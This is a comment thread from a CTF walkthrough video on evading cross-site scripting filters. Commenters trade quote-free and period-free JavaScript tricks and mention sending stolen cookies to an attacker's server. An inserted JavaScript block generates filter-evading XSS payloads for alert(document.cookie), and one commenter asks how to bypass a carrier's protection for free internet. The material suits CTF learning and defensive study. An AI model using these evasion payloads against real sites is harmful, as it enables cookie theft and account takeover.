All-Army CyberStakes! Cross-Site Scripting Filter Evasion

  • Published 10 Feb 2025

Comments • 90

  • @SB-rf2ye 3 years ago +15

    I love how John teaches the subject. He most likely already knows the answer, but knows that showing the methodology is more important. Trying different things, failing sometimes, then finally winning are what make a good hacker.

  • @joshuakorbut239 3 years ago +7

    I know it's old but I've been binging your videos and bro, just amazing. The use of python to wreck like everything makes me sooo sooo happy.. I've literally understood coding 1000% better just watching your content.

  • @booruledie3052 3 years ago +2

    One of the best CTF questions I've ever seen so far. Also a great solution! Congrats John

  • @blackmagicprod7039 4 years ago +1

    New to your channel but eating it up. I’m not a security guy or a CS/SE major or anything, I just like computers and find these videos so interesting. I could never solve these boxes by myself but the way you present these solutions makes it FEEL like I could have come to the same conclusions myself. I think that’s a hallmark of a great teacher, keep it up!

  • @dw0x 4 years ago +26

    This was very interesting! More of this (:

  • @DrovaRS 4 years ago +2

    Your videos have been great to watch while I’m stuck in a tractor away from my laptop

  • @leblanc666666 2 years ago

    I would have never thought about that base64 and atob(), nice little trick to bypass filters to keep in my pocket! Great fun lab!

  • @tanercoder1915 4 years ago +10

    I was just stuck to the screen when I saw you used Python to do injections. So cool. You have a unique method I haven't seen elsewhere. Go Python in BB!

  • @hlbgghj 3 years ago

    Incredible, sir, I really loved it, and please keep these videos coming.

  • @Vogel42 4 years ago +5

    13:30 You can call functions using square brackets notation instead of a period.
    String.fromCharCode -> String['fromCharCode']

    • @Vogel42 4 years ago

      @GiQQ Oh, you are right. How about using a slash string instead of single quotes?

    • @ethisfreedom 1 year ago

      same lol

  • @legndery 4 years ago +5

    Haha, from a JS dev perspective, template literals (backticks) were the first thing that came to my mind when you were searching for a string without quotes.

  • @erich8456 4 years ago +42

    "hit the dislike button twice" - just when I thought you couldn't be any more clever... kudos to you sir.

    • @_JohnHammond 4 years ago +9

      Ha! I think that is a common joke among YouTubers. :) Thanks so much for watching!

  • @dephy2003 3 years ago

    Binging on your content. Love seeing your thought process as you run into roadblocks.

  • @viv_2489 3 years ago

    This was so informative and beautiful in a short video 👌

  • @rehmankhan6081 3 years ago

    I see myself there doing PT with my client application finding all possible xyz. Exactly, I got that PT feel bro..🍻🔥

  • @3xp0netken 2 years ago

    The real process of a hacker: investigate, persist, evade the obstacles... you earned a subscriber, bro, good video

  • @nickcarter7063 3 years ago

    I know I'm late on this one, but I'm just binging on your old stuff at 2:30am. The backticks allow you to use ES6 syntax to create a template literal, previously referred to as a template string I believe.
    So instead of:
    var name = "Nick"
    var output = "My name is" + name
    alert(output) // outputs "My name is Nick"
    We can use name and change output to:
    var output = `My name is ${name}`
    Our alert will produce the same result without needing to concatenate the string and variable and eliminates the need for using quotes for the string. This is a very simple example, but when you need to concatenate a lot of stuff it saves a bunch of time. It also apparently helps to make this attack work which is super cool.

  • @abhhibirdawade9657 4 years ago +1

    You are amazing 😀

  • @Andrei-ds8qv 3 years ago

    Wowww, that was awesome!!!!!

  • @stackoverflow2155 3 years ago

    really enjoyed this!!!

  • @tomasgorda 4 years ago

    Again an amazing video. Every day I'm checking YouTube and looking forward to your next one :)). Great job, keep going ;)

  • @nicola1421 4 years ago +1

    That was so epic man 🤘🏼🤘🏼

  • @kuldeepsingh2983 3 years ago

    This is awesome.

  • @HerozTech 4 years ago

    Best of its kind
    Thanks so much mentor

  • @jaiganesh851 4 years ago +1

    The way you were using Python... mind boggling... Please, if possible, do make tutorials on Python and JavaScript for pentesters or bug hunters.
    Thank you for bringing the great content. Love

  • @abdulbasit-jj8qf 2 years ago +1

    I love how you approach the problem... it is excellent.
    Also, how do you get the output of Python in a new window? By default it opens in a panel.

  • @akashrakshit8446 3 years ago

    Dude quality stuff 👌👌👌

  • @Cooliofamily 1 year ago

    That ad at 18 minutes was 🤌🏼

  • @cocosloan3748 4 years ago +2

    You're amazing. Period.

    • @_JohnHammond 4 years ago

      Thanks so much! And thanks for watching!

  • @imaok4721 4 years ago

    I quite enjoyed that.

  • @manmoon7396 4 years ago

    Man, John, looking forward to "python primer for hackers!" Great stuff, keep it up.

  • @anujchourange1792 4 years ago

    You are just awesome bro !!!!!!!!!!!!

  • @whosdavidce 4 years ago

    this is amazing man

  • @luckypathan1958 4 years ago

    Love your work bro❤️❤️

  • @spikespiangel 4 years ago +2

    17:00 base64 also has forward slashes, that's why I think it didn't work.
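
The quote-free and period-free tricks raised in the comments above (String['fromCharCode'] via bracket notation, template literals instead of quoted strings, atob() over a base64 literal, and the forward-slash problem that base64 brings with it) as one added example. This is not code from the video or the CTF; the blocklist of rejected characters is an assumption chosen to match those comments, and the payload is the alert(document.cookie) discussed in the thread.

```javascript
// Added example, not code from the video or the CTF: three ways to spell the
// same XSS payload so it contains none of the characters a naive blocklist
// filter rejects. The blocklist is an assumption chosen to match the tricks
// in the comments: quotes, periods and forward slashes are rejected,
// backticks and square brackets are not.

const BLOCKED = new Set(['"', "'", '.', '/']);

// True when the candidate contains no blocked character.
function passesFilter(candidate) {
  return ![...candidate].some((ch) => BLOCKED.has(ch));
}

// 1. String.fromCharCode reached with bracket notation (no '.'), the property
//    name written as a template literal (no quotes). The browser rebuilds the
//    original source text, so eval() is still needed to run it.
function charCodeVariant(code) {
  const codes = Array.from(code, (ch) => ch.charCodeAt(0)).join(',');
  return 'eval(String[`fromCharCode`](' + codes + '))';
}

// 2. atob() over a base64 literal held in a template literal. The base64
//    alphabet contains '/' and '+' (and '=' for padding), so the encoded form
//    can trip the filter even though the source did not. For ASCII source a
//    '/' can only come from a '?' (or DEL) landing in the third byte of a
//    3-byte group, and a '+' from '>' or '~' there. Leading spaces shift every
//    group and so move those bytes to a different slot; trailing spaces only
//    change the last group and the '=' padding. Both are harmless to the JS.
function base64Variant(code) {
  for (let lead = 0; lead < 3; lead++) {
    for (let tail = 0; tail < 3; tail++) {
      const src = ' '.repeat(lead) + code + ' '.repeat(tail);
      const b64 = Buffer.from(src, 'utf8').toString('base64');
      const candidate = 'eval(atob(`' + b64 + '`))';
      if (passesFilter(candidate)) return candidate;
    }
  }
  throw new Error('no alignment passed the filter; rewrite the source instead');
}

// 3. No encoding at all: bracket property access with a template-literal key,
//    e.g. document[`cookie`] instead of document.cookie.
function bracketVariant(object, property) {
  return object + '[`' + property + '`]';
}

// Demo with the payload from the video.
const RAW = 'alert(document.cookie)';
console.log(passesFilter(RAW));                         // false: '.' is blocked
console.log(charCodeVariant(RAW));
console.log(base64Variant(RAW));
console.log('alert(' + bracketVariant('document', 'cookie') + ')');
```

Run it with node to print the rewritten forms. The part worth keeping is the second function: base64 of ASCII text only produces a '/' when a '?' (or DEL) sits in the third byte of a 3-byte group, so adding spaces at the end of the source cannot fix it, while a leading space shifts every group and moves the offending byte somewhere else.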

  • @prakasakatheilluminator6904 3 years ago

    Which package are you using at 6:35 for the Build Output tab?

  • @Beast-cc7xd 3 years ago

    Amazing video man!! New sub and like, more XSS videos!!!!
    Do you give a course on Udemy or something like that on web hacking? If not, it would be great, we would all buy it

  • @sudosuraj 3 years ago

    That Was awesome

  • @newtimes 4 years ago +5

    When you submitted the URL, were you just hoping that an admin/moderator would click on that link? Or how did you get that cookie?

    • @saeedsaeed9 4 years ago +8

      Yup, that's correct. Typically in a CTF challenge there will be an automated browser that will access what you submit with an admin session.

  • @Vagelis_Prokopiou 4 years ago

    Awesome 👍

  • @LuminousWatcher 3 years ago

    `b to a` and `a to b`

  • @lordvoldemort7692 4 years ago

    Thanks bro, I really learn new techniques every time I watch your videos. I wish you would teach us how to hunt bulk URLs and work with bulk 😁😁😁✔

  • @lordykarus 4 years ago

    amazing

  • @joewharton7735 2 years ago

    What I would do is make the string the fragment and pull it from there

  • @p.kay_____ 4 years ago +1

    Cool🤩

  • @hlbgghj 1 year ago

    Sir, start a series on Python, like solving CTFs in Python; it's gonna be really fun ❤

  • @slonkazoid 4 years ago +1

    TIL: he doesn't know javascript syntax

  • @neilthomas5026 4 years ago +1

    This was actually so cool lol

  • @adamstrickland97 1 year ago

    Hey John, wondering if you can expand on your CORS comments from the end of the video. You mention that when a script from the target site tries to reach out to the attacker's site, you can see a CORS error. However, isn't that error entirely in the attacker's control? Couldn't you have returned the right CORS headers from your server to allow the request through?

  • @mostafanasser3065 3 years ago

    Great video, and I love your unique way of solving the challenge with Python, but couldn't you have done all this with Burp Suite?

  • @jatinmahida4660 4 years ago

    Watch the article in incognito mode for medium

  • @nonoperation2356 4 years ago

    Love this, can you suggest any other XSS CTFs?

  • @NeelNarayan 4 years ago +4

    you gotta add "JOIN" button for content exclusive to your members, i reckon it would be totally worth it.

  • @gunblad3 4 years ago

    Very nice. Wonder if it’s a bot clicking on the links you submit or an actual person

  • @ahmedezealdean6189 7 months ago

    seeing you hacking made me love hacking very much.

  • @sudha2373 4 years ago

    Where did you learn Python for cyber security?

  • @imhassan9119 4 years ago

    Can anyone explain how he made a request sending the dictionary and it injected the code?

  • @serafeimzaragas5573 4 years ago

    Great video. I want to block my mobile carrier's XSS protection to have free internet. Give me an idea please.

  • @Colaholiker 3 years ago

    So basically if you don't have a server on the internet, you're SOL?

    • @_JohnHammond 3 years ago +1

      No, you can use ngrok and tunnel out a local listener, and you don't need a server on the internet for that.

    • @Colaholiker 3 years ago

      @_JohnHammond If your router allows this. Unfortunately most DSL routers you get from your provider here in Germany won't allow open ports at all. All that mine offers externally is VPN access into my home network. But you can't open up any ports, like for a locally running web server, to be accessible from the outside. And even more unfortunately, with most providers you can't even replace the router with something of your choice, as your account is linked to the router's serial number and it won't connect with another device. With some providers you don't even get a true IP that can be reached normally from the internet, like some provider-level NAT. I guess we drew the short straw. ;-)
      The most crappy thing is that a very popular router model with the stock firmware would allow all of that, but provider customization removed these features for "enhanced customer security".

  • @d3vashishs0ni 3 years ago

    I think I have to leave bash and start python🐍🐍

  • @Shintowel 2 years ago

    Teacher

  • @offmymeds13 4 years ago

    What is your primary job? I noticed you have to be in mil to do this challenge. I'm in the Army myself

  • @onions5113 4 years ago

    Can you make a video on how to make different types of payloads?

  • @assunecotlage8682 4 years ago

    What extension is that in Sublime?

  • @GaryFrancis-q3r 3 years ago

    Couldn't you just do "document.cookie" with the browser dev tools? Why create a script to send this info to your server?
    Whom does that session actually belong to?

    • @_Omni 3 years ago

      🤦‍♂️

  • @ca7986 4 years ago

    ♥️

  • @domasjanulis106 4 years ago

    Trying to encode but getting this one:
    Traceback (most recent call last):
      File "/home/bango/Desktop/project.py", line 10, in <module>
        payload = base64.b64encode(payload)
      File "/usr/lib/python3.8/base64.py", line 58, in b64encode
        encoded = binascii.b2a_base64(s, newline=False)
    TypeError: a bytes-like object is required, not 'str'

    • @domasjanulis106 4 years ago

      I added payload = base64.b64encode(payload.encode('utf-8'))

  • @shaistasiddic1822 4 years ago

    Nice()

  • @DOMPurify.isSupported 3 years ago

    Man 😍

  • @mattfowler6504 4 years ago

    meme review 👏👏

  • @threeMetreJim 4 years ago

    You are out of free articles? Looks like a div overlay thing with a css blur filter on the article below. Some sites actually used to use that (now they use mostly a blurred generic background), suffice to say I never had trouble reading the articles. In chrome, dev tools, remove element (the overlay), then disable any css blur effects, and enable y-overflow (a lot stop you from scrolling the page too). Submit article, does it appear rendered to other users? Next thing is try to enter something that confuses their anti xss system into displaying what you need. You can view page source to check for any odd effects. If you can get an external script into a src attribute somehow, then host it remotely would be a good trick to play.

    • @threeMetreJim 4 years ago

      Comment written before watching the entire video, just in case anyone wondered.

  • @optimistemo01 1 year ago

    I rather had an idea like h1 on DOM content full load do function :3

  • @nusn43 3 years ago

    Bro, where is the Python script code from this video?

  • @nusn43 3 years ago

    Bro how are u today? I am anonymous haha

  • @sorrefly 3 years ago

    Your videos are priceless. You don't just show the attack but also the process and the evolving of ideas while designing the attack.
    Premium content, thank you really.